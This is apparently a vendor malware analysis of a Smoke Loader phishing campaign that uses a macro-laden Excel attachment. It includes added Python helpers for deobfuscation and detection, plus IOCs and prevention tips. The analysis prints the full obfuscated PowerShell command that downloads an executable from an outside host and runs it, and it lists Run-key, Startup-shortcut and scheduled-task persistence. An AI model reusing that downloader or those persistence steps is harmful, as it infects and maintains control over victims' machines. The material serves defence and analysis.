Smoke Loader Malware Campaign Overview
Recently, a new malware campaign has been observed targeting Italy, in which an attacker sends phishing emails carrying a malicious .XLSX attachment.
The attacker takes advantage of the DDE (Dynamic Data Exchange) feature of Microsoft Excel.
When the user double-clicks the attached XLSX file, Microsoft Excel opens it and attempts to execute the malicious macro code on the victim's machine, which in turn downloads the payload through a PowerShell script.
Flow Chart:

Technical Analysis of SMOKE LOADER Malware Campaign
File Name: 53802918_f24_26062018.xls
MD5: 8F80EC0EAD35359225A0102D28D851F9
File Type: XLSX
Spread Via: E-mail
Detailed Description of the SMOKE LOADER Malware Campaign with Screenshots
When 53802918_f24_26062018.xls is opened, it launches Microsoft Excel in Protected View mode.

Figure 1 Enable Content (Macros Disabled)
By default, Microsoft Office applications have Protected View turned on and macros disabled for security reasons.
If the user has disabled this protection mechanism and enabled macros, the warning notification does not pop up and the document will harm the system.
So it is always recommended never to disable Protected View.
If the user clicks the Enable Content button or does not use Microsoft's default Protected View mode, the malicious macro automatically downloads the payload into the %temp% location with the help of Powershell.exe:
%temp%\{Random-ID}.exe
As shown below, Excel.exe spawns several child processes.

Figure 3 Process Tree
As shown below, 53802918_f24_26062018.xls contains an obfuscated malicious macro that is not readily understandable by a normal user.
The macro code below has a Sub Workbook_Open() function, which means the malicious macro code is activated as soon as the workbook is opened, provided macros are enabled by the user.

Figure 2 Jumbled Macro Code
By debugging the obfuscated macro code above, we found that it runs the following malicious PowerShell script in the background.

Figure 3 During Debugging
CMd /c" POwerSHeLL -nolO -exEcu bypAss -nONI -nOprOFi -wiNd HiDDeN "$7d0mK6 = [TyPE](\"{1}{0}{3}{2}\" -f 'on','ENVIr','Nt','mE') ; do{&(\"{1}{0}\" -f'ep','sle') 33;${D`es} = $7d0mk6::geTFolDeRPAtH(\"Desktop\");(&(\"{0}{1}{2}\" -f'Ne','w-','Object') (\"{0}{2}{1}{3}{5}{6}{4}\"-f'Sy','te','s','m.Ne','ent','t.Web','CLi')).dOwNloADfILE.inVOKE(\"hxxp://cloudphotos.party/fogliodati\",\"$Des\7515685[.]exe\")}while(!${?});&(\"{0}{2}{3}{1}\"-f 'St','ocess','art','-Pr') $Des\7515685.exe"
As shown above, the PowerShell script attempts to connect to the URL; if the URL is active, it downloads the payload to C:\Users\admin\Desktop\
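To read what the quoted one-liner actually does, an analyst resolves the PowerShell `-f` format-string tricks, the backtick-split variable names and the prefix-abbreviated powershell.exe switches. The Python helper below is an added example (not from the original write-up); it works on a constructed excerpt of the script shown above and assumes the obfuscation is limited to those three techniques.

```python
import re

# Constructed excerpt of the obfuscated PowerShell one-liner quoted in the write-up
# (the outer cmd /c wrapper is dropped; the URL stays defanged as in the report).
SAMPLE = r'''POwerSHeLL -nolO -exEcu bypAss -nONI -nOprOFi -wiNd HiDDeN "$7d0mK6 = [TyPE](\"{1}{0}{3}{2}\" -f 'on','ENVIr','Nt','mE') ; do{&(\"{1}{0}\" -f'ep','sle') 33;${D`es} = $7d0mk6::geTFolDeRPAtH(\"Desktop\");(&(\"{0}{1}{2}\" -f'Ne','w-','Object') (\"{0}{2}{1}{3}{5}{6}{4}\"-f'Sy','te','s','m.Ne','ent','t.Web','CLi')).dOwNloADfILE.inVOKE(\"hxxp://cloudphotos.party/fogliodati\",\"$Des\7515685[.]exe\")}while(!${?});&(\"{0}{2}{3}{1}\"-f 'St','ocess','art','-Pr') $Des\7515685.exe"'''

# ("{1}{0}" -f 'b','a'): a format string, the -f operator, then the quoted fragments
FMT_RE = re.compile(r'''\(\\?"((?:\{\d+\})+)\\?"\s*-f\s*((?:'[^']*'\s*,?\s*)+)\)''')

# powershell.exe parameters the sample abbreviates; PowerShell accepts any unique prefix
PS_PARAMS = ["NoLogo", "NoExit", "NoProfile", "NonInteractive", "ExecutionPolicy",
             "WindowStyle", "EncodedCommand", "Command", "File", "InputFormat",
             "OutputFormat", "Sta", "Mta", "Version"]


def resolve_format(fmt: str, args_src: str) -> str:
    """Apply the -f operator: replace each {n} with the n-th quoted fragment."""
    args = re.findall(r"'([^']*)'", args_src)
    return re.sub(r"\{(\d+)\}", lambda m: args[int(m.group(1))], fmt)


def expand_switch(sw: str) -> str:
    """Expand an abbreviated -Parameter by unique case-insensitive prefix; leave ambiguous ones alone."""
    hits = [p for p in PS_PARAMS if p.lower().startswith(sw.lower())]
    return hits[0] if len(hits) == 1 else sw


def deobfuscate(cmd: str) -> str:
    """Recover the readable script: full switch names, resolved -f strings, plain variables."""
    head, sep, script = cmd.partition(' "')           # switches, then the quoted script body
    head = re.sub(r"-([A-Za-z]+)", lambda m: "-" + expand_switch(m.group(1)), head)
    script = FMT_RE.sub(lambda m: resolve_format(m.group(1), m.group(2)), script)
    script = re.sub(r"\$\{([^}]*)\}", lambda m: "$" + m.group(1).replace("`", ""), script)  # ${D`es} -> $Des
    script = re.sub(r"&(?=[A-Za-z])", "", script)     # call operator before a now-literal cmdlet name
    return head + sep + script.replace('\\"', '"')   # drop the cmd-level quote escaping


def indicators(clean: str) -> dict:
    """Pull the recovered cmdlets and the download URL out of the cleaned script."""
    return {
        "urls": re.findall(r'hxxps?://[^\s"]+', clean),
        "cmdlets": sorted({c.lower() for c in re.findall(r"(New-Object|Start-Process|sleep)", clean, re.I)}),
    }


if __name__ == "__main__":
    cleaned = deobfuscate(SAMPLE)
    print(cleaned)
    print(indicators(cleaned))
```

The cleaned output reads as a plain `New-Object System.Net.WebClient ... DownloadFile` loop followed by `Start-Process`, which is what the sandbox trace in the figures confirms.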
Once started, the payload copies itself to %appdata%\Microsoft\Windows\ucbaigjt\cvbesvse.exe
Thereafter, it creates a shortcut link at the following location:
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ucbaigjt.lnk
The malware also has a persistence mechanism: it creates an entry in the task scheduler so that it runs automatically every 10 minutes:
C:\Windows\system32\tasks\Opera scheduled Auto update (random ID)
Thereupon, it attempts to connect to its C&C server (hxxp://cloudmegavideo[.]Bid) to download an additional payload (URSNIF malware) to the following location:
%AppData%\Microsoft\Batmredm\Appxnapi.exe
Appxnapi.exe is made to run automatically by adding the following registry entry:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\[AxInASDS] %AppData%\Microsoft\Batmredm\Appxnapi.exe
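The process chain and the persistence artefacts described above (Excel spawning a hidden PowerShell downloader, the Startup .lnk, the scheduled task and the Run key) map directly onto detection rules. The Python below is an added example, not part of the write-up; it runs those rules over constructed Sysmon-style events, and the field names and the scheduled-task suffix are assumptions.

```python
import re

# Constructed Sysmon-style events modelled on the chain in the write-up: Excel -> cmd -> hidden
# PowerShell downloader, then a Startup .lnk, a scheduled task and a Run key (task suffix made up).
EVENTS = [
    {"id": 1, "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd /c" POwerSHeLL -nolO -exEcu bypAss -nONI -nOprOFi -wiNd HiDDeN ..."'},
    {"id": 1, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "POwerSHeLL -nolO -exEcu bypAss -nONI -nOprOFi -wiNd HiDDeN $c.dOwNloADfILE.inVOKE(...)"},
    {"id": 11, "target": r"C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ucbaigjt.lnk"},
    {"id": 11, "target": r"C:\Windows\System32\Tasks\Opera scheduled Auto update 1234"},
    {"id": 13, "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AxInASDS",
     "details": r"%AppData%\Microsoft\Batmredm\Appxnapi.exe"},
    {"id": 1, "parent": r"C:\Windows\System32\userinit.exe", "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},                          # benign control event
]

OFFICE = ("excel.exe", "winword.exe", "powerpnt.exe")
SHELLS = ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe")
HIDDEN_PS = re.compile(r"-w\w*\s+hid", re.I)     # -w/-wind/-WindowStyle Hidden: any unique prefix is accepted
BYPASS_PS = re.compile(r"-e\w*\s+bypass", re.I)  # -ep/-exEcu/-ExecutionPolicy Bypass


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, evidence) pairs for events matching the campaign's behaviour."""
    hits = []
    for e in events:
        if e["id"] == 1:                                  # process creation
            parent, child, cl = basename(e["parent"]), basename(e["image"]), e["cmdline"]
            if parent in OFFICE and child in SHELLS:
                hits.append(("office_spawns_shell", f"{parent} -> {child}"))
            if child == "powershell.exe" and HIDDEN_PS.search(cl) and BYPASS_PS.search(cl):
                hits.append(("hidden_bypass_powershell", cl[:60]))
        elif e["id"] == 11:                               # file creation
            t = e["target"].lower()
            if "\\start menu\\programs\\startup\\" in t and t.endswith(".lnk"):
                hits.append(("startup_lnk_persistence", e["target"]))
            elif "\\windows\\system32\\tasks\\" in t:
                hits.append(("scheduled_task_persistence", e["target"]))
        elif e["id"] == 13 and "\\currentversion\\run\\" in e["target"].lower():  # registry value set
            hits.append(("run_key_persistence", f'{e["target"]} = {e.get("details", "")}'))
    return hits
```

Feed real Sysmon events (IDs 1, 11 and 13) with the same fields into `detect()` and every stage of the chain described above produces one hit, while ordinary logon activity produces none.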
IOCs
Associated Hash
8F80EC0EAD35359225A0102D28D851F9
856A792E418146BBF302A5AC9AB69FB7
0F499E0BB20EAEE792ED05B85D4A35C7
9F040EE0B7046F39C8A28459841DB2CC
Associated URL
hxxp://cloudphotos.party/fogliodati
hxxp://cloudmegavideo[.]Bid
Associated Registry Entry
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\[AxInASDS] %AppData%\Microsoft\Batmredm\Appxnapi.exe
Tips to Prevent Viruses and Malware from Infecting Your System:
- Enable your pop-up blocker: Pop-ups and ads on websites are the tactic most commonly adopted by cybercriminals or developers whose core intention is to spread malicious programs.
So avoid clicking on dubious sites, software offers, pop-ups etc., and install a powerful ad blocker for Chrome, Mozilla, and IE.
- Keep your Windows updated: To avoid such infections, we recommend that you always keep your system updated through automatic Windows Update. Doing so helps keep your device free from viruses. According to the survey, outdated/older versions of the Windows operating system are an easy target.
- Third-party installation: Try to avoid freeware download websites, as they usually bundle additional software with the installer or stub file.
- Regular backup: Regular, periodic backups help keep your data safe in case the system is infected by a virus or any other malware. So always back up important files regularly to a cloud drive or an external hard drive.
- Always have an antivirus: Precaution is better than cure. We recommend that you install an antivirus like ITL Total Security or a good malware removal tool.